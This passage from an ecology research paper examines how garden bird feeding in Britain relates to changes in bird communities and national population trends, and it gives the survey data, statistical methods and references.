Previous research has demonstrated that, across species, bird population trends are significantly reduced in urban areas compared to other habitats31. Therefore, to understand whether feeding, specifically, could be contributing to the wider population changes reported, we needed to be able to separate the influence of feeder use from other co-varying drivers of garden bird numbers that also operate along a gradient of urbanisation32. To achieve this, we focused our analysis on the changes in bird populations occurring in urban areas of Britain only, where garden bird feeders are widely accessible to all birds19, allowing us to test the effect of feeding independently of any other potential influences associated with the urban gradient32. Using all available trends for species (n = 72) occurring in urban areas of Britain (namely, all urban, suburban and rural human-dominated habitats31) we tested for a difference in the urban population trends for the species that regularly use garden feeders (n = 33), compared to those which do not (n = 39). Compellingly, feeder-users had significantly different population trajectories from those species with equal access to, but which do not commonly visit, feeders (F1,70 = 7.43, p = 0.008; Fig. 3c), with no phylogenetic influence (Pagel’s λ < 0.001). In fact, while there was no overall directional change for the species that do not use feeders, by comparison populations of feeder-users increased significantly (Fig. 3c).
Since these results do not distinguish cause and effect between increasing supplementary food use and population growth definitively, we checked whether or not similar differences between the two species groups also occurred throughout the rest of Britain (i.e. non-urban areas). Finding the same pattern would suggest that the differences observed in urban areas are reflecting broader population changes, with birds moving into gardens in approximate proportion to their availability by area, following something like an ideal free distribution across the wider countryside33. However, we found no difference between the non-urban trends for these groups (F1,70 = 1.71, p = 0.196), implying that the relationship is more likely to have resulted from birds choosing to use garden feeders than from them expanding their habitat use due to population growth. While many other factors are certain to influence interspecific variation in trends, these findings provide the first landscape scale evidence consistent with garden bird feeding having influenced population change.
Wild bird feeding has become ingrained into human culture across many areas of the world within the last half-century, to the extent that this seemingly small-scale activity is now frequently acknowledged for its demonstrable benefits to human well-being5,34,35,36,37. Nonetheless, the historical basis for feeding wild birds began with the perception that, by providing food during winter, one can improve the survival prospects of vulnerable individual birds5. Changes to bird feeding activities conducted in gardens are already reported to have resulted in stark ecological and evolutionary responses within some individual bird species38,39. Our findings indicate that the consequences of feeding reach further still, with evidence that this habitual human activity is also associated with the national-scale restructuring of bird communities.
Intuitively, the types of food provided should affect the types of species attracted10,12. Our results indicate that the diversifying commercial bird food market has enabled a growing number of species to exploit supplementary foods over time, while some appear to have lost out as a result of behaviourally dominant or better adapted species becoming more common within the community. Indeed, the bird assemblage that commonly uses feeders (Fig. 3a) includes species of high conservation concern30, species capable of promoting human well-being40 and species considered common pests41. Feeding is, therefore, highly likely to have already had important effects, and greater coordination of feeding activities, across networks of gardens and at multiple spatial scales, could be an innovative way of delivering large-scale conservation or species management outcomes in the future42.
Feeding birds is a growing practice throughout the world, with many people shifting from traditional, winter-only feeding to provisioning all year round5. If feeding continues to intensify, it will likely exacerbate the species- and community-level consequences observed here. Greater food diversity, innovation in feeder design, variation in food quality and behavioural adaptation by birds all have the potential to influence the frequency of feeder use and the benefits or detrimental impacts accrued, with downstream consequences for population sizes and community structure. The positive influences of feeder use on population size reported here are likely to be the product of a combination of improved survival3,4, better physiological condition13,43 and increased productivity44 among the individuals frequenting feeders. However, negative impacts of supplementary feeding have been widely reported, particularly those associated with increased disease transmission at feeders and the poor nutritional quality of food supplements45,46,47,48. Further research is needed to determine whether, and how, these might limit population growth. Individual decisions by homeowners to feed wild birds can impact cumulatively upon bird communities across large spatial scales. As such this growing, global phenomenon has profound potential to influence biodiversity further and should not be underestimated.
Evidence of garden bird feeding industry change
Garden bird feeding industry data were derived from advertisements featured in Birds magazine; a free publication, widely distributed to members of the Royal Society for the Protection of Birds (RSPB; recent membership figures totalled over 1.2 million49). Our assessment focused on all advertisements promoting garden bird food and/or feeder products in the Autumn editions of Birds from 1973 to 2005. After 2005, advertising was biased toward RSPB-branded products. Over the 33-year period considered, the number of pages featuring all forms of advertising in Birds increased linearly (GLS \(\chi _1^2\) = 26.19, p < 0.001), correlated with a general increase in magazine length (r = 0.901, n = 33, p < 0.001). For every advertisement (n = 179), we extracted data for its size (proportion of page covered), and the names and descriptions of individual food and feeder products. Foods were also allocated to one of 21 different food type categories (see Supplementary Table 1) using product descriptions, images and online information.
To test for temporal changes in supplementary food quantities, the food and feeder product ranges from all advertisements were summed (respectively) per magazine (n = 33). To test for temporal changes in supplementary food diversity, we quantified the number and diversity (using Simpson’s diversity index) of food types represented in each magazine. We ruled out the possibility that observed patterns were confounded by increased advertising space by controlling for the total number of pages featuring bird feeding industry advertisements (advertising pages). Number of bird food products and number of feeder products were modelled separately as a function of a year smooth using generalised additive models (GAMs), with a Poisson error distribution. Advertising pages was also log-transformed and included as an offset, since the number of products advertised was expected to be proportional to the total amount of advertising space available. The number of different food types and food diversity over time were modelled as a function of year using generalised least squares (GLS) with advertising pages included as a covariate. Food type number was log-transformed to reach normality of the residuals. In a further test for overall growth in the bird food industry, we modelled the proportion of total advertising space dedicated to feeding products as a function of a year smooth using a GAM. Full details about model specifications are given below.
Garden Bird Feeding Survey
Data from the Garden Bird Feeding Survey (GBFS) were used to investigate changes in bird communities at feeders in mainland Britain between winter 1973/4 and winter 2012/13 (40 years). GBFS is an annual survey monitoring the number of birds visiting feeders in domestic gardens over a 26-week period from October to March (www.bto.org/gbfs). The survey comprises an average of 217.8 (s.e.m. 7.1) gardens each year, covering a representative range of garden types (suburban/urban and rural) and a consistent geographic distribution. Participants leaving the scheme are replaced with new volunteers from the same region, and with gardens of a similar type and size.
Survey participants record the maximum number of each bird species observed simultaneously using feeders (i.e. at/on feeders and in their vicinity) each week or, in the case of sparrowhawk, feeding on birds using feeders. Data for all species known to occur in Britain according to the British Bird List22, except vagrants (n = 6 species), were used to estimate community indices (n = 133; Supplementary Table 2). Scarce migrants, summer migrants (recorded at the beginning or end of the winter period) and species not traditionally considered as garden visitors (e.g. wetland birds) were retained to avoid removing evidence of community change. Records for domestic and aviary species were excluded (n = 21). Species with ambiguous identification, such as marsh tit and willow tit, were combined. Changes in community composition are unlikely to have been biased by long-term changes in the arrival and departure of British breeding migrants, since estimated phenological shifts are not large enough to have noticeably increased the probability of these migrants being recorded by GBFS50. Similarly, although volunteer field-skills are not formally controlled, there is no reason to suspect spatial biases or temporal change in the accuracy of species’ identification and counts.
Since diversity estimates are influenced by sampling effort51, the data were restricted to gardens with at least 20 weekly submissions for a given winter (mean = 25.13 weeks), as this number of replicates was seen to produce reliable species richness and species-specific abundance measures. More specifically, species accumulation curves, averaged across gardens each winter, reached an asymptote with 20 weeks of surveying. Further, we used general linear mixed models (GLMMs) controlling for garden and year random effects to verify that increasing sampling effort over 20 weeks had no effect on winter abundance (defined as the maximum count observed in a garden across all weeks surveyed). Winter abundance was independent of sampling effort in 94% of species (n = 125/133), significantly more than expected by chance (z-test, χ2 = 101.2, p < 0.001, 95% CI = 89.2 – 100.0%). We note that maximum counts provide an accurate (asymptotic) means of comparing changes in relative abundances across species, but probably under-represent true abundance.
The filtered data set used to conduct the analyses comprised 1,001 GBFS gardens in mainland Britain (mean ± s.e.m. per year = 185.8 ± 6.1) that contributed a total of 186,825 weekly submissions over the 40-year survey period (Supplementary Fig. 1). We do not expect the data set to contain any biases that might influence the observed findings, given that the data were collected across a consistent set of gardens using structured sampling to a defined protocol, and that the species list has been carefully validated and sampling effort controlled. Any erroneous data, for example due to species misidentification, should be a source of noise rather than bias.
Potential drivers of bird community change
To estimate the potential for species’ spatial range shifts to impact measures of community temporal change, distribution data from the 1981/82–1983/84 Winter Atlas25 were compared with equivalent data from Bird Atlas 2007–201124 to identify areas where a species had apparently colonised or apparently disappeared at a 10-km resolution. Data were available for 98% (n = 130) of all species represented in the GBFS data set (Supplementary Table 2); three species were not recorded during either winter atlas period. GBFS gardens were assigned data from the 10-km squares in which they were located, allowing the net change in the number of GBFS gardens located within a species’ range to be calculated and averaged across all species (using the median due to data skew).
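Assuming each garden is keyed to its 10-km square and each atlas supplies a set of occupied squares per species, the net range-change statistic reduces to a few lines. A hedged sketch (the data structures and names are invented for illustration):

```python
from statistics import median

def net_range_change(gardens_sq, ranges_early, ranges_late):
    """Median (across species) net change, in percentage points, of the
    proportion of gardens falling inside each species' range between two
    atlas periods. `gardens_sq` is a list of the 10-km square ids holding
    GBFS gardens; `ranges_*` map species -> set of occupied squares.
    The median is used because per-species changes are skewed."""
    n = len(gardens_sq)
    changes = []
    for sp in ranges_early:
        early = sum(sq in ranges_early[sp] for sq in gardens_sq) / n
        late = sum(sq in ranges_late.get(sp, set()) for sq in gardens_sq) / n
        changes.append(100.0 * (late - early))
    return median(changes)
```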
In addition to examining bird community changes through time, three potential drivers of garden bird feeder use were also considered: number of feeders, winter temperature18 and local habitat28. The numbers of hanging feeders, bird tables and ground feeding stations (collectively termed feeders) were recorded each week in surveyed gardens. Weekly feeder numbers were averaged annually by feeder type and in total, to provide an indicator of supplementary food availability throughout winter in each garden. To examine changes in the provision of garden bird feeders over time, numbers of feeders, in total and by feeder type, were log-transformed and fitted separately against year using linear mixed models (LMM) with garden identity included as a random effect. The log-linear functional relationship, which specifies the percentage change in numbers of feeders over time, was applied to achieve normality of the residuals.
Gardens were classified as either suburban/urban or rural according to their surrounding habitat. Suburban/urban includes gardens in areas with a mix of built cover and green space, or in dense urban areas with little vegetation, such as town centres. Rural includes gardens in areas away from towns, with just a few scattered houses, farms or other isolated buildings. The difference in garden habitat types was verified using Land Cover Map 199052, which showed that rural gardens were located in 1-km squares with significantly less urban cover on average than suburban/urban gardens (rural = 12.04% ± 0.70 s.e.m.; suburban/urban = 42.66% ± 1.06; χ2 = 40265, p < 0.001). Gardens were re-classified from rural to suburban/urban if urban encroachment occurred (n = 6 gardens), but garden identity remained unchanged.
We expected that weather conditions throughout the whole bird data collection period would have a greater influence on feeder use than extreme weather events. Therefore, annual measures of average winter temperature were estimated using mean monthly temperature for October – March and used to test for climatic effects on feeder use. Mean monthly temperature (°C) data were extracted from the UK Meteorological Office Climate Projections (UKCP09) 5 × 5-km resolution gridded data set53. Gardens were assigned averaged winter temperature data for the 5-km square in which they were located.
Evidence of bird community change
We used annual measures of species richness, Simpson’s diversity index and k-dominance to examine bird community patterns. Species richness was the total number of species observed throughout the winter. Simpson’s diversity index was used to provide a robust and meaningful measure of community diversity per winter51. Since Simpson’s diversity incorporates both the number of species present and their relative abundances, its comparison with species richness was also used to infer changes in bird community evenness. k-dominance curves—which plot the cumulative abundances of all species in a community (as percentages) against their species rank (logged)—were used to study changes in community evenness over time51. We used species abundance and rank, averaged annually across gardens, to compare k-dominance curves from each year of the time-series. The higher the curve, the less diverse and more uneven the community it represented.
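Both metrics follow directly from the annual species counts. As a minimal illustration (Python rather than the R used for the analyses), Simpson’s diversity here is taken in its Gini–Simpson form, 1 − Σp², and the k-dominance curve plots cumulative percentage abundance against log species rank:

```python
from math import log10

def simpson_diversity(counts):
    """Simpson's diversity (Gini-Simpson form), 1 - sum(p_i^2),
    from a list of per-species abundance counts."""
    n = sum(counts)
    return 1.0 - sum((c / n) ** 2 for c in counts)

def k_dominance_curve(counts):
    """Points (log10 rank, cumulative % abundance), most abundant species
    first. Higher-lying curves indicate a less even, more dominated community."""
    ranked = sorted(counts, reverse=True)
    total = sum(ranked)
    cumulative, points = 0, []
    for rank, c in enumerate(ranked, start=1):
        cumulative += c
        points.append((log10(rank), 100.0 * cumulative / total))
    return points
```

For example, a community of two equally abundant species has a Simpson’s diversity of 0.5, and its k-dominance curve starts at 50% rather than the higher starting point of a community dominated by one species.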
To estimate national indices of species richness and Simpson’s diversity, we compiled data from all gardens into a single time-series, then applied sample-based rarefaction to standardise sampling effort through time54. Specifically, 115 gardens (equivalent to the minimum number surveyed in a single year) were randomly resampled without replacement from the total pool of gardens surveyed per year to achieve a consistent sample size over time. For each year, data from all resampled gardens were pooled and species richness and Simpson’s diversity calculated. Resampling was repeated for 1000 iterations and diversity measures averaged. Confidence intervals were not generated, since estimates derived from rarefaction are dependent on the size of the subsample and are therefore not informative about sample variability. The rarefied measures of Simpson’s diversity and species richness were modelled separately to quantify national-scale bird community trends. Simpson’s diversity was fitted against a year smooth using a GAM, and species richness was fitted against year using GLS regression.
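The rarefaction procedure amounts to repeated resampling of a fixed number of gardens, pooling their counts, and averaging the resulting indices. A simplified stdlib sketch (the data structure and names are assumptions, not the authors’ code):

```python
import random

def rarefied_indices(gardens, n_sample=115, n_iter=1000, seed=1):
    """Sample-based rarefaction: resample `n_sample` gardens without
    replacement, pool their species counts, compute richness and
    Simpson's diversity, and average over `n_iter` iterations.
    `gardens` maps garden id -> {species: count}."""
    rng = random.Random(seed)
    rich_sum = div_sum = 0.0
    ids = list(gardens)
    for _ in range(n_iter):
        pooled = {}
        for g in rng.sample(ids, n_sample):
            for sp, c in gardens[g].items():
                pooled[sp] = pooled.get(sp, 0) + c
        n = sum(pooled.values())
        rich_sum += len(pooled)
        div_sum += 1.0 - sum((c / n) ** 2 for c in pooled.values())
    return rich_sum / n_iter, div_sum / n_iter
```

Because both indices are computed on the pooled subsample before averaging, the estimates are standardised to a constant sampling effort, which is why they are comparable across years but, as noted above, uninformative about sample variability.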
To assess bird community trends at the garden scale, annual measures of species richness and Simpson’s diversity per garden were fitted using generalised additive mixed models (GAMMs) with garden identity included as a random term (n = 7433 garden-years). To evaluate the influence of other garden use drivers on bird community change, we also included number of feeders, winter temperature and habitat as fixed effects. These terms were standardised to a mean of 0 and s.d. of 0.5 to enable effect sizes to be compared directly55.
Linking feeder use to national population change
Since feeder use would need to be reasonably prevalent within a population to incur national-scale impacts, we focused on species that regularly used feeders when testing for associations between changing feeder use and changes to population size. Data were combined across all gardens per year to derive a single, intuitive index of overall feeder use per species in Britain, defined as the proportion of GBFS gardens in which a species was observed using feeders. Using site occupancy to derive feeder use, as opposed to species abundance, produces an easily interpreted measure of the scale of feeder use nationally, while also minimising the influence of stochastic variation in species counts. We conservatively defined species that regularly used feeders (feeder-users) as those with a mean feeder use of ≥ 0.1 (i.e., observed in an average of 10% of surveyed gardens per year across the study period; n = 39 species; Supplementary Table 3).
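Under this definition, the feeder-use index is a simple occupancy proportion per species. For illustration (the data structure is hypothetical):

```python
def feeder_use(observations):
    """National feeder-use index per species: the proportion of surveyed
    gardens in which the species was recorded using feeders that winter.
    `observations` maps garden id -> set of species seen at its feeders.
    Species with a mean index >= 0.1 across years would be classed as
    feeder-users under the paper's definition."""
    n_gardens = len(observations)
    species = set().union(*observations.values())
    return {sp: sum(sp in seen for seen in observations.values()) / n_gardens
            for sp in species}
```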
For all feeder-users, a binomial generalised linear model, testing the difference in feeder use between the first and last three years in the time-series (1973/4–1975/6 vs. 2010/11–2012/13), was used to estimate the value and significance of net change in feeder use. This approach was used as it could produce a measure of change that was analogous with estimates of national breeding population change over the same timeframe, while also minimising any influence of inter-annual stochasticity and avoiding assumptions about the shape of the temporal trend. More specifically, breeding population changes for feeder-users were similarly calculated as the difference between smoothed annual indices for 1974 and 2013 (i.e. the breeding seasons immediately following the beginning and end of the time-series), derived from the joint Common Bird Census/Breeding Bird Survey (CBC/BBS) trends for England30. CBC and BBS use structured, stratified protocols to monitor national bird populations and inform the UK Biodiversity Indicators. Trends were not available for eight feeder-user species, which included winter migrants and species not well covered by the CBC.
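For aggregated counts, a binomial GLM comparing the two periods is equivalent to a Wald test on the difference in log-odds of feeder use between them. A stdlib sketch with invented inputs:

```python
from math import erf, log, sqrt

def feeder_use_change(k1, n1, k2, n2):
    """Change in feeder use between the start and end of the time series:
    log-odds difference and a two-sided Wald p-value, matching the period
    coefficient of a binomial GLM on aggregated data. k = gardens where the
    species used feeders, n = gardens surveyed, for periods 1 and 2."""
    logit = lambda k, n: log(k / (n - k))
    delta = logit(k2, n2) - logit(k1, n1)
    se = sqrt(1 / k1 + 1 / (n1 - k1) + 1 / k2 + 1 / (n2 - k2))
    z = delta / se
    p = 2 * (1 - 0.5 * (1 + erf(abs(z) / sqrt(2))))
    return delta, p
```

Pooling three years at each end of the series, as described above, simply enlarges k and n for each period, damping inter-annual noise without assuming any trend shape in between.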
Phylogenetic generalised least squares regression (PGLS) was used to test the relationship between changes in feeder use and national population size (n = 31 species) while accounting for phylogenetic structure. Bird phylogeny was based on a pruned consensus tree produced by majority rules using 100 phylogenetic trees randomly extracted from the avian phylogenies developed by Jetz et al.56 (Supplementary Fig. 5). Within the pruned tree, Eurasian nuthatch (Sitta europaea) was represented by phylogenetically similar white-tailed nuthatch (S. himalayensis)57 and lesser redpoll (Carduelis cabaret) by common redpoll (C. flammea)58 since these species were absent from the global avian tree. Maximum likelihood was used to estimate the PGLS model’s Pagel’s lambda, giving a measure of the phylogenetic covariation between the predictor and response. Pagel’s lambda values of zero indicate that the predictor-response relationship is unrelated to phylogeny, whereas high lambda values indicate a strong similarity in the relationship between closely related species. To ensure that the error associated with each annual index value was accounted for within the final model outcome, we used a bootstrap procedure to produce 95% confidence limits around the PGLS regression line. For each bootstrap sample (n = 1000), new values of feeder use and population index for the beginning and end of the time series were drawn at random from the confidence limits around their original estimates, and then used to recalculate estimates of change. The PGLS model was fitted to each bootstrap sample with lambda set at the value estimated for the original model, then 95% confidence limits were calculated from the set of regression coefficients produced.
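Setting the phylogenetic correction aside (the optimised lambda for the fitted model was effectively zero), the bootstrap step amounts to redrawing each species’ change estimates within their error bounds and refitting the regression. A simplified, non-phylogenetic Python sketch with an invented (symmetric) error structure:

```python
import random

def ols_slope(xs, ys):
    """Ordinary least squares slope of y on x."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    sxx = sum((x - mx) ** 2 for x in xs)
    return sxy / sxx

def bootstrap_slope_ci(xs, ys, errs_x, errs_y, n_boot=1000, seed=1):
    """Percentile 95% CI for the regression slope, redrawing each point
    within its error bounds on both axes before refitting. A hedged,
    non-phylogenetic analogue of the paper's PGLS bootstrap."""
    rng = random.Random(seed)
    slopes = []
    for _ in range(n_boot):
        bx = [x + rng.uniform(-e, e) for x, e in zip(xs, errs_x)]
        by = [y + rng.uniform(-e, e) for y, e in zip(ys, errs_y)]
        slopes.append(ols_slope(bx, by))
    slopes.sort()
    return slopes[int(0.025 * n_boot)], slopes[int(0.975 * n_boot)]
```

The essential design choice, mirrored from the methods above, is that measurement error in both the predictor (feeder-use change) and the response (population change) is propagated into the interval, rather than treating either as known exactly.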
PGLS, using the pruned consensus tree and maximum likelihood to estimate Pagel’s lambda, was also used to test for differences in population trends between feeder-users and non-feeder users. Here, we used the 1994-2012 habitat-specific trends from Sullivan et al.31 for all breeding birds that are associated with urban areas of Britain and therefore have frequent access to garden bird feeders. These trends were available for 72 species, 33 (46%) of which had been defined as feeder-users. Feeder-users without trends were either winter migrants or did not have suitable data for population estimation. We aggregated the trends for 12 individual habitats to derive two broader trends of interest, urban and non-urban. More specifically, urban trends were estimated using a weighted average of the trends for suburban/urban settlements and rural settlements, accounting for their habitat availability. Non-urban trends were estimated using a weighted average of the trends from all other habitat types (deciduous woodland, mixed woodland, coniferous woodland, upland semi-natural open habitats, lowland semi-natural open habitats, arable farmland, pasture, mixed farming, wetlands and flowing water), accounting for their availability31.
To account for temporal auto-correlation, all trend analyses (described above) included an AR(1) correlation structure. The AR(1) correlation structure was found to be optimal for time series modelling across the different response variables, based on the comparison of models with and without different autocorrelation structures (AR1 or AR2) using AIC and the examination of auto-correlation plots for the model residuals. There was no evidence of spatial autocorrelation in bird community indices across gardens within years, according to spline correlograms fitted to the raw data using the ncf R package59. When using GAM(M)s to investigate non-linear temporal trends, year was always fitted in the form of a thin-plate regression spline with a maximum of five degrees of freedom and the gamma parameter was fixed at 1.4 to reduce over-fitting. Generalised least squares (GLS, national-scale data) and linear mixed models (LMM, garden-scale data) were used to determine the significance of linear temporal trends when GAM(M)s fitted to the same data did not indicate non-linearity (e.g. the smoothed trend had one degree of freedom, was not significant, or did not deviate enough from the linear trend to be deemed ecologically meaningful). Significance was determined using maximum likelihood, Wald statistics, χ2 and F-tests as appropriate with alpha set at 0.0560. To identify periods of significant change within non-linear trends, where the rate of change (the slope) was distinguishable from zero given the uncertainty of the model, we estimated the first derivatives of the GAM temporal smooth61,62. A significant change was assumed where the 95% confidence intervals of the first derivatives excluded zero61. All analyses were performed using R version 3.4.363. Trend analyses used the packages mgcv64 and nlme65, and phylogenetic comparative analyses used APE66, phytools67 and caper68.
The Garden Bird Feeding Survey data and the bird feeding industry data that support the findings of this study are available upon reasonable request from the British Trust for Ornithology, https://www.bto.org/research-data-services. The UKCP09 temperature data used are available under licence from the British Met Office, https://www.metoffice.gov.uk/climate. The avian phylogeny data used are publicly available from BirdTree.org, https://www.BirdTree.org.
Newton, I. Population Limitations in Birds. (Academic Press, London, 1998).
Siriwardena, G. M., Baillie, S. R. & Wilson, J. D. Temporal variation in the annual survival rates of six granivorous birds with contrasting population trends. Ibis 141, 621–636 (1999).
Siriwardena, G. M. et al. The effect of supplementary winter seed food on breeding populations of farmland birds: evidence from two large-scale experiments. J. Appl Ecol. 44, 920–932 (2007).
Baker, D. J., Freeman, S. N., Grice, P. V. & Siriwardena, G. M. Landscape-scale responses of birds to agri-environment management: a test of the English Environmental Stewardship scheme. J. Appl Ecol. 49, 871–882 (2012).
Jones, D. The Birds at My Table: Why We Feed Wild Birds and Why It Matters (Cornell University Press, Ithaca, USA, 2018).
Oro, D., Genovart, M., Tavecchia, G., Fowler, M. S. & Martínez‐Abraín, A. Ecological and evolutionary implications of food subsidies from humans. Ecol. Lett. 16, 1501–1514 (2013).
Orros, M. E. & Fellowes, M. D. Wild bird feeding in a large UK urban area: characteristics and estimates of energy input and individuals supported. Acta Ornithol. 50, 43–58 (2015).
Callahan, D. A history of birdwatching in 100 objects. (Bloomsbury Publishing, London, UK, 2014).
Francis, M. L. et al. Effects of supplementary feeding on interspecific dominance hierarchies in garden birds. PLoS ONE 13, e0202152 (2018).
Galbraith, J. A., Jones, D. N., Beggs, J. R., Parry, K. & Stanley, M. C. Urban bird feeders dominated by a few species and individuals. Front Ecol. Evol. 5, 81 (2017).
Fuller, R. A., Warren, P. H., Armsworth, P. R., Barbosa, O. & Gaston, K. J. Garden bird feeding predicts the structure of urban avian assemblages. Divers Distrib. 14, 131–137 (2008).
Galbraith, J. A., Beggs, J. R., Jones, D. N. & Stanley, M. C. Supplementary feeding restructures urban bird communities. PNAS 112, E2648–E2657 (2015).
Wilcoxen, T. E. et al. Effects of bird-feeding activities on the health of wild birds. Conserv Physiol. 3, cov058 (2015).
Robb, G. N., McDonald, R. A., Chamberlain, D. E. & Bearhop, S. Food for thought: supplementary feeding as a driver of ecological change in avian populations. Front Ecol. Environ. 6, 476–484 (2008).
Loram, A., Tratalos, J., Warren, P. H. & Gaston, K. J. Urban domestic gardens (X): the extent & structure of the resource in five major cities. Land. Ecol. 22, 601–615 (2007).
Gregory, R. D. & Baillie, S. R. Large-scale habitat use of some declining British birds. J. Appl Ecol. 35, 785–799 (1998).
Bland, R. L., Tully, J. & Greenwood, J. J. D. Birds breeding in British gardens: an underestimated population? Bird. Study 51, 97–106 (2004).
Chamberlain, D. E. et al. Annual and seasonal trends in the use of garden feeders by birds in winter. Ibis 147, 563–575 (2005).
Davies, Z. G., Fuller, R. A., Dallimer, M., Loram, A. & Gaston, K. J. Household factors influencing participation in bird feeding activity: a national scale analysis. PLoS ONE 7, e39692 (2012).
The Royal Society for the Protection of Birds. Annual Review 2007-2008 (Bedfordshire, UK, 2008).
Schultz, R. L. & Wittink, D. R. The measurement of industry advertising effects. J. Mark. Res 13, 71–75 (1976).
British Ornithologists’ Union (BOU). The British List: a checklist of birds of Britain, 8th edn. Ibis 155, 635–676 (2013).
Gillings, S., Balmer, D. E. & Fuller, R. J. Directionality of recent bird distribution shifts and climate change in Great Britain. Glob. Change Biol. 21, 2155–2168 (2014).
Balmer, D. E. et al. Bird Atlas 2007-2011: The Breeding and Wintering Birds of Britain and Ireland. (British Trust for Ornithology, Thetford, UK, 2013).
Lack, P. The Atlas of Wintering Birds in Britain and Ireland (T & AD Poyser, London, UK, 1986).
Davey, C. M., Chamberlain, D. E., Newson, S. E., Noble, D. G. & Johnston, A. Rise of the generalists: evidence for climate driven homogenization in avian communities. Glob. Ecol. Biogeogr. 21, 568–578 (2011).
Harrison, P. J. et al. Quantifying turnover in biodiversity of British breeding birds. J. Appl Ecol. 53, 469–478 (2015).
Chamberlain, D. E., Cannon, A. R. & Toms, M. P. Associations of garden birds with gradients in garden habitat and local habitat. Ecography 27, 589–600 (2004).
Miller, E. T. et al. Fighting over food unites the birds of North America in a continental dominance hierarchy. Behav. Ecol. 28, 1454–1463 (2017).
Massimino, D. et al. BirdTrends 2017: Trends in Numbers, Breeding Success and Survival for UK Breeding Birds. Research Report 704. (BTO, Thetford, UK, 2017).
Sullivan, M. J. P., Newson, S. E. & Pearce-Higgins, J. W. Using habitat-specific population trends to evaluate the consistency of the effect of species traits on bird population change. Biol. Conserv 192, 343–352 (2015).
Marzluff, J. M. A decadal review of urban ornithology and a prospectus for the future. Ibis 159, 1–13 (2017).
Fretwell, S. D. On territorial behavior and other factors influencing habitat distribution in birds. Acta Biotheor. 19, 45–52 (1969).
Cox, D. T. C. & Gaston, K. J. Urban bird feeding: Connecting people with nature. PLoS ONE 11, e0158717 (2016).
Cox, D. T. C. & Gaston, K. J. Human–nature interactions and the consequences and drivers of provisioning wildlife. Philos. Trans. R Soc Lond. B Biol. Sci. 373, 20170092 (2018).
Jones, D. N. An appetite for connection: why we need to understand the effect and value of feeding wild birds. Emu 111, i–vii (2011).
Galbraith, J. A. et al. Risks and drivers of wild bird feeding in urban areas of New Zealand. Biol. Conserv 180, 64–74 (2014).
Plummer, K. E., Siriwardena, G. M., Conway, G. J., Risely, K. & Toms, M. P. Is supplementary feeding in gardens a driver of evolutionary change in a migratory bird species? Glob. Change Biol. 21, 4353–4363 (2015).
Orros, M. E. & Fellowes, M. D. E. Widespread supplementary feeding in domestic gardens explains the return of reintroduced Red Kites Milvus milvus to an urban area. Ibis 157, 230–238 (2015).
Cox, D. T. C. & Gaston, K. J. Likeability of garden birds: Importance of species knowledge & richness in connecting people to nature. PLoS ONE 10, e0141505 (2015).
Cox, D. T. C. et al. Covariation in urban birds providing cultural services or disservices and people. J. Appl Ecol. 55, 2308–2319 (2018).
Goddard, M. A., Dougill, A. J. & Benton, T. G. Scaling up from gardens: biodiversity conservation in urban environments. Trends Ecol. Evol. 25, 90–98 (2010).
Plummer, K. E., Bearhop, S., Leech, D. I., Chamberlain, D. E. & Blount, J. D. Effects of winter food provisioning on the phenotypes of breeding blue tits. Ecol. Evol. 8, 5059–5068 (2018).
Robb, G. N. et al. Winter feeding of birds increases productivity in the subsequent breeding season. Biol. Lett. 4, 220–223 (2008).
Plummer, K. E., Bearhop, S., Leech, D. I., Chamberlain, D. E. & Blount, J. D. Fat provisioning in winter impairs egg production during the following spring: a landscape-scale study of blue tits. J. Anim. Ecol. 82, 673–682 (2013).
Plummer, K. E., Bearhop, S., Leech, D. I., Chamberlain, D. E. & Blount, J. D. Winter food provisioning reduces future breeding performance in a wild bird. Sci. Rep. 3, 2002 (2013).
Lawson, B. et al. Health hazards to wild birds and risk factors associated with anthropogenic food provisioning. Philos. Trans. R Soc. Lond. B Biol. Sci. 373, 20170091 (2018).
Fischer, J. D. & Miller, J. R. Direct and indirect effects of anthropogenic bird food on population dynamics of a songbird. Acta Oecol 69, 46–51 (2015).
The Royal Society for the Protection of Birds. Annual Review 2016-2017 (Bedfordshire, UK, 2017).
Newson, S. E. et al. Long-term changes in the migration phenology of UK breeding birds detected by large-scale citizen science recording schemes. Ibis 158, 481–495 (2016).
Magurran, A. E. Measuring Biological Diversity (Blackwell Publishing, Oxford, UK, 2004).
Fuller, R., Groom, G. & Jones, A. The land-cover map of Great Britain: an automated classification of Landsat Thematic Mapper data. Photo. Eng. Remote Sens. 60, 553–562 (1994).
Murphy, J. M. et al. UK Climate Projections Science Report: Climate Change Projections (Meteorological Office Hadley Centre, Exeter, UK, 2009).
Gotelli, N. J. & Colwell, R. K. Quantifying biodiversity: procedures and pitfalls in the measurement and comparison of species richness. Ecol. Lett. 4, 379–391 (2001).
Gelman, A. Scaling regression inputs by dividing by two standard deviations. Stat. Med 27, 2865–2873 (2008).
Jetz, W., Thomas, G. H., Joy, J. B., Hartmann, K. & Mooers, A. O. The global diversity of birds in space and time. Nature 491, 444–448 (2012).
Pasquet, E. Phylogeny of the nuthatches of the Sitta canadensis group and its evolutionary and biogeographic implications. Ibis 140, 150–156 (1998).
Knox, A. G., Helbig, A. J., Parkin, D. T. & Sangster, G. The taxonomic status of Lesser Redpoll. Br. Birds 94, 260–267 (2001).
Bjørnstad, O. ncf: spatial nonparametric covariance functions. R package version 1.1-7. https://CRAN.R-project.org/package=ncf (2016).
Bolker, B. M. et al. Generalized linear mixed models: a practical guide for ecology and evolution. Trends Ecol. Evol. 24, 127–135 (2009).
Monteith, D. T., Evans, C. D., Henrys, P. A., Simpson, G. L. & Malcolm, I. A. Trends in the hydrochemistry of acid-sensitive surface waters in the UK 1988–2008. Ecol. Indic. 37, 287–303 (2014).
Harrison, P. J. et al. Assessing trends in biodiversity over space and time using the example of British breeding birds. J. Appl Ecol. 51, 1650–1660 (2014).
R Core Team. R: A language and environment for statistical computing (R Foundation for Statistical Computing, Vienna, Austria, 2017).
Wood, S. mgcv: mixed GAM computation vehicle with GCV/AIC/REML smoothness estimation. R package version 1.8-23. https://CRAN.R-project.org/package=mgcv (2016).
Pinheiro, J., Bates, D., DebRoy, S., Sarkar, D. & Team, R. C. nlme: Linear and Nonlinear Mixed Effects Models. R package version 3.1-131. https://CRAN.R-project.org/package=nlme (2017).
Paradis, E., Claude, J. & Strimmer, K. APE: analyses of phylogenetics and evolution in R language. R package version 5.1. Bioinformatics 20, 289–290 (2004).
Revell, L. J. phytools: an R package for phylogenetic comparative biology (and other things). R package version 0.6.44. Methods Ecol. Evol. 3, 217–223 (2012).
